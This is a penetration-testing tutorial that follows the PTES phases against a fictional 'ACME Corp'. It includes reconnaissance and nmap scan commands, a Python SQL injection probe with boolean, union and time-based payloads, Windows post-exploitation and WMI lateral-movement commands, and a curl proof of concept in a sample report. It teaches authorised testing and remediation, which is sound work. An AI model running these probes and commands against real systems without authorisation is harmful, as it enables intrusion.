Introduction

Penetration testing simulates real-world attacks to identify security vulnerabilities before adversaries exploit them. A structured methodology ensures consistent, repeatable, and comprehensive assessments. The Penetration Testing Execution Standard (PTES) provides a widely adopted framework.
The PTES Standard
PTES defines seven phases, each with specific activities and deliverables: pre-engagement interactions, intelligence gathering, threat modeling, vulnerability analysis, exploitation, post-exploitation, and reporting. The walkthrough below keeps that order but folds threat modeling into the vulnerability analysis phase and closes with a post-engagement step for cleanup and lessons learned, which PTES does not list as a separate phase.
Phase 1: Pre-Engagement Interactions
Define scope, rules of engagement, and legal boundaries before any testing begins.
```yaml
rules_of_engagement:
  client: "ACME Corp"
  scope:
    in_scope:
      - "*.acme.com"
      - "203.0.113.0/24"
    out_of_scope:
      - "payment.acme.com"   # Production payment system
      - "10.0.0.0/8"         # Internal only
  restrictions:
    - no_social_engineering: true
    - no_dos_attacks: true
    - testing_window: "2026-05-15T00:00Z - 2026-05-19T23:59Z"
    - notification_list: ["security@acme.com", "incident-response@acme.com"]
  legal:
    - authorized_signatory: "Jane Doe, CISO"
    - insurance_coverage: true
    - data_handling_nda_signed: true
```
Phase 2: Intelligence Gathering (Reconnaissance)
Reconnaissance builds a target profile through passive and active information gathering. Passive techniques read public sources (certificate transparency logs, third-party subdomain indexes) and never touch the target; active techniques, including DNS queries to the target's own nameservers and HTTP fingerprinting, do touch it and belong inside the agreed testing window.

```bash
# Active recon: DNS enumeration against the target's own nameservers
# (a zone transfer attempt is a direct query to ns1.acme.com, not passive)
dig axfr @ns1.acme.com acme.com
dnsrecon -d acme.com -t axfr
dnsrecon -d acme.com -t std --db acme_recon.db

# Subdomain discovery from third-party indexes (passive)
sublist3r -d acme.com -o subdomains.txt

# Technology fingerprinting (active: fetches pages from the target)
whatweb -a 3 https://www.acme.com --log-verbose=tech_report.txt

# Certificate transparency logs (passive: queries crt.sh, not the target)
curl -s "https://crt.sh/?q=%25.acme.com&output=json" | jq -r '.[].name_value' | sort -u
```
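The two pieces above that most often go wrong in practice are scoping and the shape of crt.sh output: a `name_value` field can carry several newline-separated SANs, wildcard certificates name the parent rather than a host, and the `*.acme.com` glob in the rules of engagement does not cover the apex `acme.com`. The following is an added example, not code from the original article: it transcribes the Phase 1 rules of engagement into a Python dict, filters hostnames and IPs against in-scope and out-of-scope entries (exclusions win), checks the testing window, and runs a constructed crt.sh-style JSON sample through that filter. The sample JSON and the dict form of the rules are assumptions made for the example.

```python
import fnmatch
import ipaddress
import json
from datetime import datetime, timezone

# Rules of engagement transcribed from the YAML in Phase 1 (client "ACME Corp").
RULES = {
    "in_scope": ["*.acme.com", "203.0.113.0/24"],
    "out_of_scope": ["payment.acme.com", "10.0.0.0/8"],
    "testing_window": "2026-05-15T00:00Z - 2026-05-19T23:59Z",
}
WINDOW_FMT = "%Y-%m-%dT%H:%MZ"

def _matches(target, pattern):
    """True if a hostname or IP matches one scope entry (CIDR or host glob)."""
    try:
        return ipaddress.ip_address(target) in ipaddress.ip_network(pattern, strict=False)
    except ValueError:
        # Not an IP/CIDR pair: fall back to a case-insensitive hostname glob.
        return fnmatch.fnmatchcase(target.lower(), pattern.lower())

def in_scope(target, rules=RULES):
    """Explicit exclusions win; anything not listed as in scope is out of scope."""
    if any(_matches(target, p) for p in rules["out_of_scope"]):
        return False
    return any(_matches(target, p) for p in rules["in_scope"])

def within_window(when_utc, rules=RULES):
    """True if a UTC timestamp such as '2026-05-17T12:00Z' is inside the agreed window."""
    start_s, end_s = rules["testing_window"].split(" - ")
    start, when, end = (datetime.strptime(s, WINDOW_FMT) for s in (start_s, when_utc, end_s))
    return start <= when <= end

def names_from_crtsh(json_text):
    """Flatten crt.sh JSON: one name_value may hold several newline-separated SANs."""
    names = set()
    for entry in json.loads(json_text):
        for name in entry["name_value"].split("\n"):
            name = name.strip().lower()
            if name.startswith("*."):
                name = name[2:]  # a wildcard certificate only tells us the parent name
            if name:
                names.add(name)
    return names

def scoped_targets(json_text, rules=RULES):
    """Hostnames from CT logs that the rules of engagement allow us to test."""
    return sorted(n for n in names_from_crtsh(json_text) if in_scope(n, rules))

# Constructed sample in the shape crt.sh returns for ?q=%25.acme.com&output=json
SAMPLE_CRTSH = json.dumps([
    {"issuer_name": "C=US, O=Let's Encrypt, CN=R3", "name_value": "www.acme.com\nacme.com"},
    {"issuer_name": "C=US, O=Let's Encrypt, CN=R3", "name_value": "dev.acme.com"},
    {"issuer_name": "C=US, O=DigiCert Inc", "name_value": "payment.acme.com"},
    {"issuer_name": "C=US, O=DigiCert Inc", "name_value": "*.acme.com"},
    {"issuer_name": "C=US, O=DigiCert Inc", "name_value": "WWW.ACME.COM"},
])

if __name__ == "__main__":
    for host in scoped_targets(SAMPLE_CRTSH):
        print("in scope:", host)
    # "*.acme.com" does not cover the apex; agree on that explicitly before testing it.
    print("acme.com in scope?", in_scope("acme.com"))
    print("window open now?", within_window(datetime.now(timezone.utc).strftime(WINDOW_FMT)))
```

Run this over the real crt.sh output before feeding hostnames to any active tool; `payment.acme.com` drops out because the exclusion list is checked first, and the apex domain drops out because a glob is not a suffix match, which is exactly the kind of ambiguity to settle with the client in writing during pre-engagement.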
Phase 3: Vulnerability Analysis
Analyze gathered information to identify potential vulnerabilities: enumerate every exposed service and version, then map them to known weaknesses and misconfigurations. The -oA flag writes normal, grepable and XML output (acme_scan.nmap, .gnmap, .xml); the XML is the one to parse for the next steps.

```bash
# Port scanning with Nmap (-O needs root; --min-rate=1000 across a /24 is loud,
# may be throttled by the client's IPS, and must respect the no_dos restriction)
nmap -sV -sC -O -p- --min-rate=1000 -oA acme_scan 203.0.113.0/24

# Service enumeration
nmap -sV --script=http-enum,http-headers,http-methods,ssl-enum-ciphers \
  -p 80,443 203.0.113.0/24 -oA acme_web_scan

# Vulnerability scanning
nmap --script=vuln -p 80,443,22,3389 203.0.113.0/24 -oA acme_vuln
```
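The service enumeration and vulnerability scans above take their port lists from the first scan, and on a /24 that hand-off is where things get missed. As an added example (not code from the original article), the script below parses an nmap XML file of the kind `-oA` produces, keeps only open ports on hosts that were up, groups endpoints by service, builds the `-p` argument for the follow-up pass, and flags services on a triage list. The XML excerpt is constructed for the example, and the triage list is the tester's own assumption, not anything nmap reports.

```python
import xml.etree.ElementTree as ET
from collections import defaultdict

# Constructed excerpt in the shape nmap writes to acme_scan.xml with -oA.
SAMPLE_NMAP_XML = """<?xml version="1.0"?>
<nmaprun scanner="nmap" args="nmap -sV -p- -oA acme_scan 203.0.113.0/24">
  <host><status state="up"/>
    <address addr="203.0.113.10" addrtype="ipv4"/>
    <hostnames><hostname name="www.acme.com" type="PTR"/></hostnames>
    <ports>
      <port protocol="tcp" portid="22"><state state="open"/><service name="ssh" product="OpenSSH" version="8.2p1"/></port>
      <port protocol="tcp" portid="80"><state state="open"/><service name="http" product="nginx" version="1.18.0"/></port>
      <port protocol="tcp" portid="443"><state state="open"/><service name="http" product="nginx" version="1.18.0" tunnel="ssl"/></port>
      <port protocol="tcp" portid="3306"><state state="filtered"/><service name="mysql"/></port>
    </ports>
  </host>
  <host><status state="up"/>
    <address addr="203.0.113.25" addrtype="ipv4"/>
    <ports>
      <port protocol="tcp" portid="21"><state state="open"/><service name="ftp"/></port>
      <port protocol="tcp" portid="3389"><state state="open"/><service name="ms-wbt-server" product="Microsoft Terminal Services"/></port>
    </ports>
  </host>
  <host><status state="down"/><address addr="203.0.113.30" addrtype="ipv4"/></host>
</nmaprun>
"""

# Tester's own triage list (an assumption for this example, not nmap output).
REVIEW_HINTS = {
    "ftp": "cleartext credentials",
    "telnet": "cleartext credentials",
    "ms-wbt-server": "RDP reachable from the scan source",
    "microsoft-ds": "SMB reachable from the scan source",
}

def parse_open_ports(xml_text):
    """One record per open port on every host that was up."""
    records = []
    for host in ET.fromstring(xml_text).iter("host"):
        if host.find("status").get("state") != "up":
            continue
        addr = host.find("address[@addrtype='ipv4']").get("addr")
        hn = host.find("hostnames/hostname")
        for port in host.iter("port"):
            if port.find("state").get("state") != "open":
                continue
            svc = port.find("service")
            get = svc.get if svc is not None else (lambda k, d="": d)
            records.append({
                "host": addr,
                "hostname": hn.get("name") if hn is not None else "",
                "port": int(port.get("portid")),
                "proto": port.get("protocol"),
                "service": get("name", ""),
                "product": get("product", ""),
                "version": get("version", ""),
                "tls": get("tunnel", "") == "ssl",
            })
    return records

def by_service(records):
    """Group host:port by service name; each group feeds a targeted NSE pass."""
    groups = defaultdict(list)
    for r in records:
        groups[r["service"]].append(f"{r['host']}:{r['port']}")
    return dict(groups)

def followup_ports(records):
    """Unique open ports as an nmap -p argument for the service enumeration pass."""
    return ",".join(str(p) for p in sorted({r["port"] for r in records}))

def flag_for_review(records):
    """Open services on the review list, with the reason they need a look."""
    return [(r["host"], r["port"], r["service"], REVIEW_HINTS[r["service"]])
            for r in records if r["service"] in REVIEW_HINTS]

if __name__ == "__main__":
    recs = parse_open_ports(SAMPLE_NMAP_XML)
    for r in recs:
        print(f"{r['host']:15} {r['port']:>5}/{r['proto']} {r['service']:14} {r['product']} {r['version']}")
    print("follow-up: nmap -sV -p", followup_ports(recs))
    for host, port, service, why in flag_for_review(recs):
        print(f"[review] {host}:{port} {service}: {why}")
```

Filtered ports are deliberately excluded: a filtered result says something about a firewall, not about a service, and should not inflate the vulnerability scan's port list.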
Phase 4: Exploitation
Exploitation attempts to breach the target using identified vulnerabilities. Every payload must stay within scope and the rules of engagement: no destructive statements, no denial of service, and nothing that touches out-of-scope systems.

```python
# Custom exploit example: SQL injection test
import time
import requests

# Probes are non-destructive on purpose: a test harness must never send
# DROP/DELETE/UPDATE payloads at a client system, in scope or not.
PAYLOADS = [
    "' OR '1'='1",                     # boolean-based
    "' UNION SELECT NULL,NULL--",      # union/error-based
    "' WAITFOR DELAY '00:00:05'--",    # time-based, MSSQL
    "' OR SLEEP(5)-- -",               # time-based, MySQL
]
ERROR_SIGNATURES = ["SQL syntax", "mysql_fetch", "ORA-", "SQLSTATE"]

def test_sqli(url, params):
    # Measure baseline latency first so a slow backend is not reported as time-based SQLi
    start = time.time()
    requests.get(url, params=params, timeout=15)
    baseline = time.time() - start
    for param in params:
        for payload in PAYLOADS:
            test_params = params.copy()
            test_params[param] = payload
            start = time.time()
            resp = requests.get(url, params=test_params, timeout=15)
            elapsed = time.time() - start
            # Time-based detection: injected 5 s delay on top of the baseline
            if elapsed - baseline > 4:
                print(f"[!] Time-based SQLi in {param}: {payload}")
            # Error-based detection: database error text leaked in the response
            if any(err in resp.text for err in ERROR_SIGNATURES):
                print(f"[!] Error-based SQLi in {param}: {payload}")
```
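What the probe above is looking for is easier to see from the application's side. This added example (not code from the original article) builds a constructed SQLite table standing in for the `/api/search` backend, implements the query both as the report's finding F-001 describes it (input concatenated into the SQL string) and as its remediation prescribes (a bound parameter), then runs the harness's boolean and union payloads against each and classifies the result the same way the tester does. Table contents and the `probe` helper are assumptions made for the example; SQLite has no sleep function, so the time-based payloads are not exercised here.

```python
import sqlite3

def make_db():
    """Constructed sample table standing in for the /api/search backend."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE products (id INTEGER PRIMARY KEY, name TEXT, public INTEGER)")
    conn.executemany("INSERT INTO products (name, public) VALUES (?, ?)",
                     [("Widget", 1), ("Gadget", 1), ("Unreleased Prototype", 0)])
    return conn

def search_vulnerable(conn, query):
    """Mirrors finding F-001: user input concatenated straight into the SQL string."""
    sql = "SELECT name FROM products WHERE public = 1 AND name = '" + query + "'"
    return [row[0] for row in conn.execute(sql)]

def search_fixed(conn, query):
    """Remediation from the report: a bound parameter is always data, never SQL."""
    sql = "SELECT name FROM products WHERE public = 1 AND name = ?"
    return [row[0] for row in conn.execute(sql, (query,))]

def probe(search_fn, conn, payload, baseline="Widget"):
    """The tester's two signals, seen from the application side:
    ("error", message) when a database error escapes, ("boolean", rows) when
    the payload returns more rows than a legitimate query, else (None, rows)."""
    expected = len(search_fn(conn, baseline))
    try:
        rows = search_fn(conn, payload)
    except sqlite3.Error as exc:
        return "error", str(exc)
    return ("boolean", rows) if len(rows) > expected else (None, rows)

if __name__ == "__main__":
    for name, fn in (("vulnerable", search_vulnerable), ("fixed", search_fixed)):
        for payload in ("' OR '1'='1", "' UNION SELECT NULL,NULL--"):
            print(f"{name:10} {payload!r:32} -> {probe(fn, make_db(), payload)}")
```

Against the concatenated query, `' OR '1'='1` returns the non-public row as well because `AND` binds tighter than `OR`, and the union payload raises a column-count error that a careless handler would echo back to the client; the parameterised version returns nothing for either payload because the whole string is compared as a literal product name.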
Phase 5: Post-Exploitation
After gaining access, determine what the compromised system is worth to an attacker (data, credentials, trust relationships, reachable networks) and, only where the rules of engagement allow it, establish persistence and pivot to other hosts. Record every change you make so it can be reversed during post-engagement cleanup.
```cmd
REM Post-exploitation enumeration (run from cmd.exe on the compromised host)
whoami /all
REM findstr treats spaces as OR between search terms; use /C: for each phrase
systeminfo | findstr /B /C:"OS Name" /C:"OS Version" /C:"System Type"
net localgroup administrators
netstat -ano
REM Slow and noisy: Win32_Product triggers MSI consistency checks and event log entries
wmic product get name,version

REM Lateral movement check: does the current token have WMI rights on another host?
powershell -Command "Get-WmiObject -Class Win32_ComputerSystem -ComputerName TARGET"
```
Phase 6: Reporting
The report is the primary deliverable. It must be clear, actionable, and properly scoped for different audiences.
```yaml
report_structure:
  executive_summary:
    - risk_rating: "High"
    - total_findings: 12
    - critical: 2
    - high: 4
    - medium: 4
    - low: 2
    - business_impact: "SQL injection in main application could lead to complete data breach"
  technical_findings:
    - finding_id: "F-001"
      title: "SQL Injection in /api/search endpoint"
      severity: "Critical"
      cvss: 9.1
      description: "User input is directly concatenated into SQL queries"
      affected_endpoint: "POST /api/search"
      poc: "curl -X POST https://app.acme.com/api/search -d 'query=1%27+OR+%271%27%3D%271'"
      remediation: "Use parameterized queries; implement input validation"
  remediation_timeline:
    - immediate: "Patch critical SQL injection and RCE vulnerabilities"
    - short_term: "Implement WAF and input validation"
    - long_term: "Security training for developers, SAST integration in CI/CD"
```
Phase 7: Post-Engagement
Remove every account, tool, and persistence mechanism placed on client systems during testing, confirm with the client that the environment is back to its pre-test state, securely dispose of collected data once the agreed retention period ends, and hold a lessons-learned session with the client.
Conclusion
Effective penetration testing follows a disciplined methodology. PTES provides comprehensive coverage from legal agreements through reporting. The true value of a pentest lies not in how many vulnerabilities are found, but in the actionable remediation guidance provided in the final report.